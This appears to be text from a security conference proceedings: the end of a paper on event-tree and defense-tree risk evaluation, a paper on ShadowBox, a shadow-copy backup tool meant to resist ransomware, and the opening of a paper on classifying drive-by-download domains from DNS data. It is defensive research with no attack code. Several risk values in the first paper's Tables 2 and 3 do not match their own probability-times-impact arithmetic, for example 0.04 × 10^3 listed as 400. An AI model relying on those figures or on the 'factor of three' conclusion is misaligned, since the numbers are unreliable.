Figure 5. Sequences 1 through 3 expressed by the extended defense tree

3.3 PIS operation


The PIS for the extended defense tree for sequence 2 can be obtained as follows. Here, the cut sets of event 1 are a, b, and that of event 2 is ac:

(Event 1)(NOT Event 2) = (a, b)(NOT ac)
= (a, b)(ā, c̄)
= aā, ac̄, āb, bc̄ (aā in the formula is made null according to the complementation rule of PIS operation)
= ac̄, āb, bc̄        (12)

Here, ā denotes the negation (non-occurrence) of event a.
The complementation rule means that it is
impossible for the event to both exist and not
exist at the same time.
The complementation rule is included in PIS
operation but is not included in the MCS.
The absorption rule and the idempotent rule
are also included in PIS operation.
Here, the probability of the top event of the extended defense tree shown in Fig. 5 can be calculated as follows:

P(ac̄, āb, bc̄)
= 1 − (1 − P_a P_c̄)(1 − P_ā P_b)(1 − P_b P_c̄)
= 1 − (1 − 0.16)(1 − 0.16)(1 − 0.16)
= 1 − 0.84 × 0.84 × 0.84
≈ 0.41        (13)
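The PIS derivation for sequence 2 (Equations (12) and (13)) can be sketched as follows; literals are represented here as (event, phase) pairs with phase=False denoting a negated event, which is an implementation choice of this sketch rather than notation from the paper.

from itertools import product

def pis_product(terms_1, terms_2):
    """AND two OR-of-AND term lists and apply the complementation rule: a term that
    contains both a literal and its negation is made null."""
    result = []
    for t1, t2 in product(terms_1, terms_2):
        term = dict(t1)
        ok = True
        for event, phase in t2:
            if term.get(event, phase) != phase:
                ok = False                        # e.g. a AND not-a -> null
                break
            term[event] = phase
        if ok:
            result.append(tuple(sorted(term.items())))
    return result

def term_probability(term, p):
    prob = 1.0
    for event, phase in term:
        prob *= p[event] if phase else 1 - p[event]
    return prob

# Sequence 2 = (Event 1) AND (NOT Event 2), with Event 1 = a OR b and Event 2 = ac.
event1 = [(("a", True),), (("b", True),)]
not_event2 = [(("a", False),), (("c", False),)]   # NOT(ac) = not-a OR not-c
pis = pis_product(event1, not_event2)              # -> a·not-c, not-a·b, b·not-c
p = {"a": 0.2, "b": 0.2, "c": 0.2}
prob_none = 1.0
for term in pis:
    prob_none *= 1 - term_probability(term, p)
print(len(pis), round(1 - prob_none, 2))           # 3 terms, probability ~0.41 (cf. Equation (13))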

Figure 4. Example of a defense tree


3.4 Method of applying the improved EDC


method
The flow for applying original EDC method
was described in Section 2.1. The EDC is
improved in Step 5 Formulate a combinatorial
optimization problem. The improvement is to
add a function for dealing with a common


event. The procedure for calculating the overall


risk is as follows:
Step 5-1 Obtain the cut set of the attack
component of each defense tree. (See Fig. 4.)
Step 5-2 Obtain the PIS for each sequence.
For sequence 1:

(NOT Event 1) = NOT(a, b) = āb̄        (14)

For sequence 2:

(Event 1)(NOT Event 2) = (a, b)(NOT ac)
= (a, b)(ā, c̄) = ac̄, āb, bc̄        (15)

For sequence 3:

(Event 1)(Event 2) = (a, b)(ac)
= (ac, abc)
= (ac)        (16)

Step 5-3 Obtain a formulation to calculate the probability considering alternative countermeasures using the PIS and zero-one variables for each sequence.
For sequence 1:

Q_1 = P_0 × P_ā × P_b̄ = P_0 (1 − P_a)(1 − P_b)        (17)

For sequence 2 (introducing countermeasures as zero-one variables when one countermeasure is applied to events a and b, respectively):

Q_2 = P_0 × [1 − (1 − P_a' P_c̄)(1 − P_ā' P_b')(1 − P_b' P_c̄)]        (18)

where P_a' = P_a ((1 − x_a1) + x_a1 α_a1), P_b' = P_b ((1 − x_b1) + x_b1 α_b1), P_ā' = 1 − P_a', and P_c̄ = 1 − P_c.
Here, x_a1 represents a zero-one variable. If the first countermeasure for event a is adopted, then x_a1 = 1; otherwise x_a1 = 0. Likewise, x_b1 represents a zero-one variable: if the first countermeasure for event b is adopted, then x_b1 = 1; otherwise x_b1 = 0. Furthermore, α_a1 represents the reduction rate of the first countermeasure for event a, and α_b1 represents the reduction rate of the first countermeasure for event b.
For sequence 3 (introducing a countermeasure as a zero-one variable when one countermeasure is adopted for events a and c, respectively):

Q_3 = P_0 × P_a ((1 − x_a1) + x_a1 α_a1) × P_c ((1 − x_c1) + x_c1 α_c1)        (19)

where x_c1 represents a zero-one variable. If the first countermeasure for event c is adopted, then x_c1 = 1; otherwise x_c1 = 0. Here, α_c1 represents the reduction rate when the first countermeasure is adopted for event c.
In Fig. 4, P_a = 0.2, P_b = 0.2, P_c = 0.2, α_a1 = 0.8, α_b1 = 0.8, and α_c1 = 0.8.
Step 5-4 Obtain a formulation such as
Equation (4) to calculate the risk for each
sequence.
Step 5-5 Obtain a formulation such as
Equation (5) to calculate the overall risk.
Table 1. Rules used in PIS operation

Rule                 | Example
Idempotent rule      | aa => a
Absorption rule      | (a, ab) => a
Complementation rule | aā => Null

4 Experimental risk evaluation


Table 2 shows the results of the calculated
overall risk considering a common event using
PIS operation and without considering a
common event. Here, M1, which represents the
impact of sequence 1 of the event tree
illustrated in Fig. 1, is set to 10^1. In the same manner, M2 is set to 10^2, and M3 is set to 10^3.
In addition, the probability of each lowest event
of the defense tree is set to 0.2, and the
reduction rate due to the countermeasures is set
to 0.8 in order to clarify the effect of taking a
common event into account.
The results indicate that the overall risk may
be underestimated by a factor of three if we did
not use PIS operation.


Table 2. Probability and risk for each sequence

Sequence | Proposed method      | Previous study
         | probability | risk   | probability | risk
1        | 0.64        | 6.40   | 0.64        | 6.40
2        | 0.41        | 41.0   | 0.35        | 35.0
3        | 0.04        | 400    | 0.01        | 100
Total    |             | 447    |             | 141

Table 3 shows the overall risk when the same


countermeasure is applied to each of the lowest
events in the defense tree. Here, a is a common event, and b and c are not common events. From Table 3, we can determine that the overall
risk can be reduced to the greatest degree when
the countermeasure was applied to the common
event.
Table 3. Probability of the occurrence of each sequence due to the use of a different countermeasure

Sequence | Countermeasure applied to event a | Countermeasure applied to event b | Countermeasure applied to event c
         | probability | risk                | probability | risk                | probability | risk
1        | 0.67        | 6.7                 | 0.67        | 6.7                 | 0.64        | 6.4
2        | 0.39        | 39.0                | 0.36        | 36.0                | 0.42        | 42.0
3        | 0.03        | 300                 | 0.04        | 400                 | 0.03        | 300
Total    |             | 345                 |             | 442                 |             | 348

5 Conclusion
In the present paper, we proposed a method
that enables common event operation with the
original EDC method. Here, the EDC method,
which incorporates event tree analysis and
defense tree analysis, is used to obtain the
optimal combination of countermeasures
against targeted attacks.
In order to enable common mode operation,
instead of MCS operation, we introduce PIS
operation, which can obtain a cut set including
negative events for the sequence of the event
tree.
The results of the numerical experiment
confirmed that we can calculate occurrence
probability correctly by introducing the PIS.
Moreover, if we did not use PIS operation, the


overall risk may be underestimated by a factor


of three. Furthermore, if two countermeasures
have the same reduction rate and occurrence
probability, applying a countermeasure to a
common event is more effective than applying
it to a non-common event.
In order to use the EDC method more
effectively, we intend to develop a support
program for the revised EDC method.
Moreover, the EDC method and the support
program will be applied to a number of targets.
REFERENCES

[1] B. Schneier, "Attack trees," Dr. Dobb's Journal, vol. 24, pp. 21-29, 1999.

[2] S. Bistarelli, F. Fioravanti, and P. Peretti, "Defense trees for economic evaluation of security investments," in Availability, Reliability and Security (ARES 2006), The First International Conference on, 8 pp., 2006.

[3] Symantec, "2013 ISTR Shows Changing Cybercriminal Tactics," http://www.symantec.com/connect/blogs/2013-istr-shows-changing-cybercriminal-tactics (referenced 2016-7-27).

[4] R. Ishii, R. Sasaki, "Proposal of Risk Evaluation Method using Event Tree and Defense Tree and Its Trial Application to Targeted Attack," in Japan Society of Security Management, 8 pp., 2015 (in Japanese).

[5] N. Yuhara and H. Ujita, System Safety Studies, Kaibundo Publishing, 2015 (in Japanese).

[6] D. Kececioglu, Reliability Engineering Handbook, vol. 2, Prentice Hall, pp. 222-231, 1991.

[7] K. Takaragi, R. Sasaki, and S. Shingai, "An Algorithm for Obtaining Simplified Prime Implicant Sets in Fault-Tree and Event-Tree Analysis," IEEE Transactions on Reliability, vol. R-32, pp. 386-390, 1983.

[8] K. Ingols, R. Lippmann, and K. Piwowarski, "Practical Attack Graph Generation for Network Defense," in Annual Computer Security Applications Conference (ACSAC 2006), pp. 121-130, 2006.

[9] A. Roy, D. S. Kim, and K. S. Trivedi, "Attack countermeasure trees (ACT): towards unifying the constructs of attack and defense trees," Security and Communication Networks, vol. 5, pp. 929-943, 2012.

[10] Fault Tree Handbook with Aerospace Applications, https://www.hq.nasa.gov/office/codeq/doctree/fthb.pdf


Proposal of Unified Data Management and Recovery Tool Using Shadow Copy
Naoki Matsutaka and Masato Eguchi, Takuya Okazaki,
Takashi Matsumoto, Tetsutaro Uehara*, Ryoichi Sasaki
Tokyo Denki University
Senjuasahicho 5, Adachi-ku, Tokyo-to, 120-8551 JAPAN
*Ritsumeikan University
Tojiinkitamachi 56-1, kita-ku, Kyoto-fu, 603-8577 JAPAN
[email protected]

ABSTRACT
In recent years, solid state drives (SSD) have started
to replace hard disk drives. An SSD is a high-speed
storage device with a TRIM function. However, an
SSD cannot restore deleted files. Therefore, the user
is required to back up data for protection. The
Microsoft Volume Shadow Copy Service (VSS) is
often recommended for backups. However,
although it has tools for backup, they are
complicated to use. In addition, VSS does not have
enough implemented functions. Therefore, we
propose a unified tool named ShadowBox, which
easily helps typical users to create a shadow copy
and to restore data from it. In addition, we discuss
the protection of shadow copy data from attacks due
to malicious persons and ransomware.

KEYWORDS
Backup, Shadow Copy, SSD, Ransomware, Data
Protection

1 INTRODUCTION
In recent years, solid state drives (SSDs) have
begun to replace hard disk drives (HDDs). An
SSD, which is a solid-state semiconductor
storage device, can read data at high speed,
because it does not move a head on the medium.
This feature is different from the data reading
of a HDD. The usage percentage of SSDs will
continue to increase as their data capacity is
expanded and their performance is improved.
On the other hand, SSDs have problems such as their inability to recover data for digital


forensics or to restore erroneously erased data. An SSD


has a function named TRIM, which
automatically detects deleted data and creates
an empty block. The TRIM function can
increase the data writing speed. On the other
hand, TRIM has the disadvantage that a deleted
file cannot be recovered. The data on an HDD
or USB flash memory can be restored just after
deleting a file, because such devices do not
have a TRIM function. If TRIM is enabled, the
SSD recognizes the deleted data as unnecessary.
Moreover, the TRIM function completely
deletes the actual data. This makes digital
forensics difficult with an SSD. For the same
reason, when important files are deleted by
mistake, they cannot be recovered. As an
example, Yamamae et al. (2015) conducted an
experiment on restoring the erased files of an SSD [1]. The results showed that the deleted
files could not be recovered even immediately
after deletion when TRIM was enabled. In
addition, most deleted data was lost after only
one day even if TRIM was not enabled.
Therefore, using an SSD requires backing up
data for protection, because recovery of data is
impossible.
The Microsoft Volume Shadow Copy Service
(VSS) has tools for creating shadow copies and
restoring files from these copies. However,
using these tools is not easy and they lack some
required functions. In addition, no tools capable
of protecting shadow copy data from attacks of
ransomware or the malicious behavior of
internal persons have been proposed.


Therefore, we propose a unified tool named


ShadowBox that easily helps the typical user to
create shadow copies and to restore data from
them. In addition, this tool can protect shadow
copy data from attacks of ransomware or
malicious internal persons. ShadowBox is made
up of three applications: VSSManager,
VSSaver and VSSLogger. VSSManager is a
tool for easily backing up and restoring shadow
copy files. VSSaver and VSSLogger are used
cooperatively to protect the shadow copy area
and to log attacks against it. Among the three
application programs, only VSSManager has
actually been developed. The developed
program was evaluated by test users from the
viewpoint of usability. In this paper, Section 2
describes the backup process using VSS. We
deal with related studies and existing tools in
Section 3. We describe an overview of
ShadowBox in Section 4, and present the
details of the developed VSSManager in
Section 5. The result of the evaluation of
VSSManager is shown in Section 6, and future
work is described in Section 7. Section 8
concludes the paper.

2 BACKUP USING SHADOW COPY

VSS is a Windows function for creating snapshots, i.e., shadow copies. It can duplicate stored files in a special area, and these files can be restored even if the original files are deleted. First, VSS takes a snapshot in order to record the state of the storage. It subsequently replicates individual files each time they are deleted or modified. Therefore, the backup time is short compared with that for other methods. Moreover, the data capacity for a backup using shadow copies can be decreased, because only the modified or deleted data are stored. Table 1 shows the time and space required for the backup of a normal copy and a shadow copy of a file with a size of 100 GB on an HDD. In addition, although a traditional backup cannot copy files that are either running or locked, VSS can copy a file in any state.

Table 1. 100 GB file backup (HDD)

                 Normal Copy   VSS
Processing time  777.4 sec     3.7 sec
Data capacity    100 GB        55.5 MB

3 EXISTING TOOLS AND RELATED STUDIES

3.1 Previous Versions and ShadowExplorer

Some of the backup tools used with VSS include Previous Versions and ShadowExplorer. Windows has a Previous Versions feature that creates a shadow copy, sets a storage area, and then restores the file [2]. Figure 1 shows the dialog boxes of Previous Versions. ShadowExplorer lists the backup files and restores any file from the shadow copy [3]. Figure 2 shows a screenshot of ShadowExplorer.

Figure 1. Previous Versions (Left: system properties, Right: volume properties)

Figure 2. ShadowExplorer

3.2 Problems with existing tools


As described in Section 3.1, Previous Versions
creates a shadow copy, sets the storage area,

and then restores the file. However, these functions are executed in separate dialog boxes.
For example, the System Properties dialog box
is used to set the storage area and create the
shadow copy. The Volume Properties dialog
box is then used to restore a file from the
shadow copy. In other words, Previous
Versions does not have unified functions for
handling the shadow copy. Protecting the data
is inconvenient for the user because the backup
and restore functions are separate. As a result,
measures against an attack cannot be carried
out. Users gave opinions such as "much time and effort is required before starting the operation" and "the operation is difficult to understand". Therefore, Previous Versions
has a problem with its operation.
ShadowExplorer was developed for restoring
files. It is impossible to use it for creating a
shadow copy and setting the parameters for
restoring. In addition, the operation of
ShadowExplorer is difficult to understand. For
example, after opening a folder, ShadowExplorer provides no way to return to a folder higher in the hierarchy. Moreover, information
about the file cannot be shown in the file table
for ShadowExplorer. These issues make it
difficult to search for a file. Table 2 shows the
functions of the existing tools. The circles
indicate implemented features. From Table 2,
we can see that the functions of these tools are
disjointed and therefore difficult to use
collectively.
Table 2. Functions of existing tools

Function       Previous Versions          Shadow
               (System)    (Volume)       Explorer
Create SC*
Delete SC
Set storage
List SC
Restore file
Search file

*SC = Shadow Copy


3.3 Related studies


No backup tools that protect against ransomware or unauthorized deletion are currently available for SSDs. This includes VSS, and no new backup tool based on VSS has yet been proposed.
However, many backup tools have been
proposed for cloud computing and peer-to-peer
networks. Arthur et al. (2011) proposed a
secure cloud backup system [4]. This system
manages backup data and ensures the safety of
the data by encryption. However, the backup
time depends on the online baud rate, so these
systems are not suitable for replicating a large
number of files. Yoshida et al. (2016) built a
backup system for disaster or failure using a
peer-to-peer network [5]. This system builds a
network of trusted users. As a result, it achieves
the needed redundancy, dispersion and security.
These systems can protect data from
ransomware and release data from a local
device. However, if one of the users is a
malicious person, these systems cannot protect
the data.
4 PROPOSAL OF SHADOWBOX
4.1 Overview of the proposed tool
The purpose of this study is safe management
of data by the development of ShadowBox,
which has a function to protect shadow copy
files from attacks by malicious persons or
ransomware. The main features of the
implementation are described below in steps 1-3.

1. Create a shadow copy and restore a file.
2. Protect the shadow copy from an unauthorized deletion command.
3. Provide the information gathered in step 2 to the administrator.

Step 1 is a basic function found in traditional backup tools. ShadowBox makes it possible to use the function easily and efficiently by solving the problems of the existing tools. Moreover, it prevents incorrect deletions and manages data by implementing the functions in
steps 2 and 3. ShadowBox also provides a
unified function for safely protecting data in a
PC.
4.2 Proposed method
ShadowBox is made up of three applications:
VSSManager, VSSaver, and VSSLogger.
VSSManager is a tool for easily backing up and
restoring files using VSS. VSSaver and
VSSLogger are used cooperatively to protect
the shadow copy area and to keep a log of
attacks to this area. ShadowBox starts VSSaver
as a resident application and monitors the
Delete command given to the shadow copy area.
If a process attempts to delete the shadow copy
area, it detects the attempt and stops the process.
At the same time, ShadowBox starts
VSSLogger. VSSLogger identifies the parent
process that issued the Delete command. This
information and a dump file are then provided
to the administrator. If the file is encrypted by
ransomware, VSSManager restores the file
from the data in the shadow copy. Figure 3
shows the structure of ShadowBox. We
developed VSSManager first, and it is the only
currently developed application. VSSManager
is further described in the next section.

5 DEVELOPMENT OF VSSManager

5.1 Development environment

VSSManager is written in C# and runs on Windows 7. The total number of lines in the developed program is approximately 4617. Table 3 shows the development environment of VSSManager. ShadowBox uses the AlphaVSS library to create the shadow copy and to list the backup files [6].

Table 3. Development environment

OS        Windows 7
Language  C#
Library   .NET Framework 4.0, AlphaVSS 1.2.4000.3
Lines     4617

5.2 Overview of VSSManager


VSSManager, which was developed to solve
the problems described in Section 3.2,
implements the functionality required by the
user at the time of backup and restore. We
developed a GUI by assuming the operation of typical users. As mentioned earlier,
VSSManager has the ability to create and
manage the shadow copy, and restore a file.
VSSManager can efficiently back up data and
restore files by unifying the basic functions.
Table 4 shows the problems of existing tools
and the improvement by VSSManager.

Figure 3. Overview of ShadowBox


Table 4. Problems and improvements of existing tools

Problems with existing tools              VSSManager
Cannot collectively use the functions     Has centralized functions (described in Section 5.1)
Cannot create a shadow copy on a          Selects volumes when creating the shadow copy
per-volume basis
Searches files that target a single       Allows searches for multiple shadow copies
shadow copy
Difficult to set storage                  Has an intuitive user interface
Not enough displayed file information     Displays files with icons or thumbnails
Troublesome to move between folders       Implements back and forward buttons and displays the current folder path
We developed the user interface to help the
typical user to conduct backups easily. In
Previous Versions, the shadow copy is created
automatically and controlled by the Windows
OS. However, because a complex procedure is
required to create the shadow copy, it is
difficult for users to execute the application in a
timely manner. Therefore, we developed the
function to set the timing freely when creating
the shadow copy using Previous Versions.
VSSManager has the functions Create shadow
copy, Manage storage, Restore a file, and
Search for a file. Figures 4-7 show the dialog
boxes of VSSManager.

Figure 4. Dialog for creating a shadow copy


Figure 5. Dialog for setting storage

Figure 6. Dialog for restoring file

Figure 7. Dialog for searching for file

6 EVALUATION
6.1 Method of evaluation
An evaluation was conducted to determine
whether the developed tool is suitable for
operation by a typical user. Ten students in our
laboratory participated as users in the
experimental evaluation. They used the
developed VSSManager as well as existing
tools. The users were taught how to use the
tools in advance. They evaluated the usefulness
with a five-point score. Here, "very hard to use" was 1 and "very easy to use" was 5. Moreover,
the users described their impressions of using
the tools.


6.2 Results of evaluation

Table 5 shows the evaluation results. As mentioned above, "very hard to use" was 1 and "very easy to use" was 5. The table shows the average values of the evaluations of Previous Versions and ShadowExplorer along with VSSManager.

Table 5. Evaluation of tools (SC = shadow copy)

Function            Previous Versions   ShadowExplorer   VSSManager
Creation of SC      2.6                 -                4.7
Setting storage     1.5                 -                4.9
Searching for file  3.4                 3.0              3.6

From Table 5, VSSManager obtained a higher rating than the existing tools in the creation of a shadow copy and setting the storage area, from the viewpoint of "Creation of shadow copy" and "Setting storage area". From this result, it is considered that VSSManager offers simplified and intuitive operation. In the users' opinions, VSSManager would obtain better evaluations if given more options to evaluate, such as "fewer steps" and "operation easy to understand". Therefore, we can verify that we were able to achieve the purpose of this research. On the other hand, the file search function is rated almost identically for VSSManager and the existing tools. Some opinions about the file search included "it was very hard to search for a file". Therefore, a more effective file search function is required. In addition, one opinion was that it was difficult to become familiar with the user interface of VSSManager. The presumed reason is that the users normally use the Windows OS and manipulate files in Windows Explorer. For this reason, they think it is easier to use Previous Versions, which is similar to Windows Explorer. That is, because the look and feel of VSSManager is different from that of Windows Explorer, they might feel a sense of incongruity.

7 FUTURE WORK

7.1 Improvement of VSSManager

From the results of the experimental evaluation,
we know that the file search function should be
improved. In the case of VSSManager, the
function to search for files directly by file name
is not effective, because sometimes there are a
very large number of matches. Moreover, the
user sometimes does not remember the file
name. Therefore, an approach different from
using the filename is required. We suggest a
new feature that lists the deleted files and the
updated files to make it easier to find the
desired file. The following two approaches can
be considered. After implementing the
following two approaches in VSSManager, the
user could evaluate them.
Approach 1: Compare the current volume and
the shadow copy.
This approach compares the file in the current
volume and the file in the shadow copy.
Then, deleted files are defined as those that
exist only on the shadow copy side. Updated
files are defined as those that have an equivalent file on the shadow copy side but an updated timestamp. This approach significantly
narrows down the number of target files, and so
it would be possible to reduce the effort to look
for files. Figure 8 shows a method to compare
the current volume and the shadow copy.

Figure 8. Approach 1: Comparing the current volume and the shadow copy
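As a rough illustration of Approach 1 (our own sketch in Python, not part of VSSManager, which is written in C#; the directory paths in the example are hypothetical), the comparison can walk a mounted shadow copy and the current volume and list the deleted and updated files:

import os

def compare_trees(current_root, shadow_root):
    # List files deleted from or updated on the current volume,
    # relative to a mounted shadow copy (Approach 1).
    deleted, updated = [], []
    for dirpath, _, filenames in os.walk(shadow_root):
        for name in filenames:
            shadow_file = os.path.join(dirpath, name)
            rel = os.path.relpath(shadow_file, shadow_root)
            current_file = os.path.join(current_root, rel)
            if not os.path.exists(current_file):
                deleted.append(rel)       # exists only on the shadow copy side
            elif os.path.getmtime(current_file) > os.path.getmtime(shadow_file):
                updated.append(rel)       # equivalent file with an updated timestamp
    return deleted, updated

# Example call (paths are made up):
# deleted, updated = compare_trees(r"C:\Users\alice", r"Z:\shadow\Users\alice")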


Approach 2: Detect the deleted files


This method monitors the files in the volume
and records the paths of the deleted files. Then,
in the shadow copy, it enumerates the files that
have been deleted by referring to the file paths.
This approach reduces the time to find the
desired files. Figure 9 shows the method for
detecting the deleted files.

Figure 9. Approach 2: Detect the deleted files

7.2 Development of ShadowBox


VSSManager is one of the existing applications
of ShadowBox. The goal of this study is the full
development of ShadowBox. Therefore, we are
now developing the two remaining applications,
VSSaver and VSSLogger. Once developed,
VSSaver and VSSLogger will be evaluated for
security and usability.
8 CONCLUSION
We proposed the unified tool named
ShadowBox, which helps typical users to create
a shadow copy and to restore data from it. This
tool has a function to protect the data in the
shadow copy against the attacks of ransomware
or malicious internal persons. ShadowBox
consists of three applications, VSSManager,
VSSaver, and VSSLogger. VSSManager,
which is the only application that we have
actually developed, is a tool for easily backing
up and restoring files using a shadow copy. The
experimental results showed that the usefulness
of the program is better than that of existing
tools. In the near future, we will improve the
searching function of VSSManager and
continue to develop and evaluate VSSaver and
VSSLogger.

REFERENCES

[1] A. Yamamae, Y. Kobayashi, T. Uehara, R. Sasaki, "Experiment and evaluation of recoverability of removed files in SSD," IPSJ SIG-DPS, 2015-DPS-162, 39, pp. 1-7, 2015-02-26.

[2] Volume Shadow Copy Service, https://msdn.microsoft.com/en-us/library/windows/desktop/bb968832(v=vs.85).aspx

[3] How do I configure and use shadow copy in Microsoft Windows?, http://www.techrepublic.com/blog/windows-and-office/how-do-i-configure-and-use-shadow-copy-in-microsoft-windows/

[4] A. Rahumed, H. Chen, Y. Tang, P. Lee, and J. Lui, "A Secure Cloud Backup System with Assured Deletion and Version Control," International Conference on Parallel Processing Workshops, 40, pp. 160-167, 2011.

[5] T. Yoshida, T. Odaka, J. Kuroiwa and H. Shirai, "Fault Tolerant Data Backup System Using Peer-to-Peer Network," 64, pp. 57-63, 2016.

[6] AlphaVSS, http://alphavss.codeplex.com/


Countermeasure against Drive by Download Attack by Analyzing Domain Information
Tadashi Kimura and Ryoichi Sasaki
Tokyo Denki University
Senjuasahicho 5, Adachi-ku, Tokyo-to, 120-8551 JAPAN
[email protected], [email protected]

ABSTRACT
In recent years, malware infections by Drive by
Download (DbD) attacks carried out with the
cooperation of malicious web sites have caused
serious damage. The blacklist method is a current
typical countermeasure that blocks access to a
malicious web site registered to a blacklist when the
users PC does a redirect. However, the attacker can
install malicious web sites one after another, and it
is impossible to add the malicious web sites to the
blacklist immediately. Thereby, countermeasures
against new malicious web sites are difficult using
this method. To cope with this issue, we propose a
method that utilizes a support vector machine
(SVM) and the data in a domain name system
(DNS) to identify the domain used in the DbD
attack. The result of an experiment showed a
detection rate of 92.75%.

KEYWORDS
Drive by Download, Domain Name System, WHOIS, Support Vector Machine, Akaike's Information Criterion

1. Introduction
In recent years, malware infections by Drive
by Download (DbD) attacks have caused
serious damage. DbD attacks are carried out
with the cooperation of malicious web sites [1].
Figure 1 shows the flow of a DbD attack.


Figure 1. Flow of DbD attack.

The blacklist method is a current typical


countermeasure against DbD attacks that blocks
access from a user's PC to a malicious web site that is registered in a blacklist stored in the user's PC. However, attackers can change an
ordinary web site to a new malicious web site
one after another. Although the blacklist is
updated every day, there is a delay between
updates [2]. Therefore, measures against newly
established malicious web sites have become an
urgent need.
Therefore, we focus on the domain
information in the domain name system (DNS).
We have analyzed the domains of web sites
related to DbD attacks (DbD domains) and the
domains of legitimate web sites (benign
domains). Based on the results, we confirmed
that there is a difference in the numbers and
values of domain information.
In this paper, we propose a method using a
support vector machine (SVM) [3] and DNS
data to identify domains. We conducted
experiments combining domain information to
derive the optimal combinations for the
identification of DbD domains.


The proposed method stops access to a URL


that contains a domain classified as a DbD
domain. Thereby, this method is considered to
be able to stop access to DbD attack sites that
have not been posted on the blacklist.


2. Related Work
Okayasu et al. proposed a specific method
using the SVM and domain information in the
DNS to classify a domain in order to identify
the command and control (C&C) server of a
botnet [4].
Ma et al. also proposed a countermeasure
using domain information to identify malicious
web sites used for phishing or spam attacks [5].
Moreover, approaches that detect obfuscated
JavaScript have been proposed by many
researchers to find a DbD. Here, obfuscated
JavaScript is JavaScript program code that
contains inserted characters representing
malicious behavior.
Jodavi et al. proposed a detection method
that uses the frequency of a hidden function in
JavaScript and the maximum value of the depth
of the eval nest [6]. Su et al. proposed a
countermeasure using an information theoretic
index against obfuscated JavaScript [7].
Jayasinghe [8] proposed a detection method
using the Opcode log obtained from the
JavaScript engine.
However, a method to classify a domain by
using SVM and DNS domain information to
identify web sites used for a DbD attack has not
previously been proposed.
3. Proposed Research Method
In this study, we conducted a classification
experiment using the SVM and domain
information. For the SVM, we used scikit-learn [9], a machine learning library written in Python.
As a preliminary survey in the experiment,
first we obtained the domain information of a
DbD domain and a benign domain by querying
the DNS server. Next, the numbers and values
of the record of the acquired domain

ISBN: 978-1-941968-37-6 2016 SDIWC

The domain information used in the


experiment was obtained by querying the DNS
server. Table 1 shows the acquired domain
information and research methods.
Table 1. Domain information and research methods

No.   Domain information    Library and command for research
1     TTL                   Resolv
2     MINIMUM               Resolv
3     RETRY                 Resolv
4     EXPIRE                Resolv
5     REFRESH               Resolv
6     MX record             Resolv
7     NS record             Resolv
8     TXT record            Resolv
9     Preference            Resolv
10    TXT-Strings           Resolv
11    A record              DNS-Client
12    Country               DNS-Client
13    Registration period   WHOIS command

As the domain information, information for numbers 1 to 5 is described in the start of
authority (SOA) record. Information of
numbers 6 to 8 and 11 is described in the DNS
record. Number 10 is the number of strings of a
TXT record. Number 12 is the assigned country
of the domain. Number 13 is the number of
days until the expiration date of the domain
from its date of registration.
In this study, the Resolv library [10] acquired
the information for numbers 1 to 10, the DNS
Client library [11] for numbers 11, 12, and the
WHOIS command for number 13.
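As a rough illustration of how several of the Table 1 features could be gathered (the paper used the Ruby Resolv library, the DNS-Client library, and the WHOIS command; the sketch below uses the Python dnspython package instead, and the example domain is arbitrary):

import dns.resolver

def soa_and_record_features(domain):
    # Collect a few of the Table 1 features: TTL, SOA timers, and record counts.
    features = {}
    soa_answer = dns.resolver.resolve(domain, "SOA")
    soa = soa_answer[0]
    features["TTL"] = soa_answer.rrset.ttl
    features["MINIMUM"] = soa.minimum
    features["RETRY"] = soa.retry
    features["EXPIRE"] = soa.expire
    features["REFRESH"] = soa.refresh
    for rtype in ("MX", "NS", "TXT", "A"):
        try:
            features[rtype] = len(dns.resolver.resolve(domain, rtype))
        except dns.resolver.NoAnswer:
            features[rtype] = 0
    return features

# print(soa_and_record_features("example.com"))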


3.2 SVM
The SVM is one of the supervised learning
models used in machine learning, and it can be
applied to classification and regression.
The first feature of the SVM is linear
mapping, which enables linear classification by
converting the data. The second feature is
margin maximization. A margin is the smallest
value of the distance to the identification
surface and the individuals belonging to each
group. Each individual is called a Support
Vector, which represents the shortest distance
to the identification surface. Learning is done to
maximize the margin between the identification
surface and the Support Vector, and as a result,
Support Vectors exhibit high identification
performance. Figure 2 shows a schematic
diagram of the classification by the SVM.

Figure 2. Schematic diagram of the SVM.

3.3 Cross-validation
If the sample data for obtaining test and
training data are small, an error in the
classification accuracy can possibly occur.
Therefore, we conducted the experiment by
using the cross-validation [12] method for
verifying the validity of the classification
accuracy.
Figure 3 shows a schematic diagram of the
cross-validation method. We experimented with
10-fold cross-validation. First, we divided the sample data into 10 parts. One part was used as test data, and the rest were training data. After
replacing the test data and the training data,


cross-validations were performed a total of 10


times. The estimated detection rate was the
average value of the accuracy in the 10
experiments. The method of calculating the
detection rate is described in Section 5.1.

Figure 3. Schematic diagram of cross-validations.
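A minimal sketch of this classification and cross-validation step with scikit-learn, the library named in Section 3 (the feature matrix below is only a made-up stand-in for the real scaled domain vectors, and the paper uses 10 folds on 400 domains):

from sklearn.svm import SVC
from sklearn.model_selection import cross_val_score

# X: one row of scaled feature values per domain; y: 1 = DbD domain, 0 = benign
X = [[1, 2, 1, 3], [3, 1, 2, 1], [1, 3, 1, 2], [3, 1, 3, 1]]   # illustrative only
y = [1, 0, 1, 0]

clf = SVC(kernel="rbf")
scores = cross_val_score(clf, X, y, cv=2)   # cv=10 in the actual experiment
print("estimated detection rate:", scores.mean())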

4. Experimental Dataset Analysis


4.1 Experimental dataset
We used 200 DbD domains and 200 benign
domains in the experiment.
The DbD domains were extracted from the URLs included in the Drive by Download Marionette (D3M) Dataset 2015 [13]. The D3M dataset is a DbD attack communication record provided by the MWS anti-malware research personnel training workshop [14].
The domain information of a benign web site
depends on the scale of the web site. Therefore,
it is possible for a deviation to occur in a
dataset due to the chosen benign web site.
Thus, we collected domains from large-scale web sites, middle-scale web sites, and
small-scale web sites. Large-scale web sites
were collected from Alexa's "The top 500 sites on the web" [15]. Middle-scale web sites were collected from the Fortune 500 world's largest company rankings [16]. Small-scale web sites were also collected from the Fortune 500 middle- and small-scale company rankings. Table 2
shows the number of domains in each of the
experimental datasets.


Table 2. Experimental datasets

                        Domains
DbD attack site         200
Large-scale web site    100
Middle-scale web site   70
Small-scale web site    30

4.2 Domain information survey result


The result of the trial investigation confirmed
a particularly large difference in the name
server (NS) records and the registration period.
The NS record is intended to define the DNS
server that manages the zone information for a
domain.
In the survey result of the obtained NS records,
80% of the benign domains had three or more
NS records whereas 20% of the DbD domains
had the same number of records. Because the
attacker makes successive installations of attack
sites, it is considered that an attacker does not
have enough time to set the NS record. Figure 4
shows the survey results of the NS records.

Figure 4. Survey result of NS records.

Next, Figure 5 shows the research result of


the registration period. The registration period
of the benign domain was longer than that of
the DbD domain. For this reason, it is thought
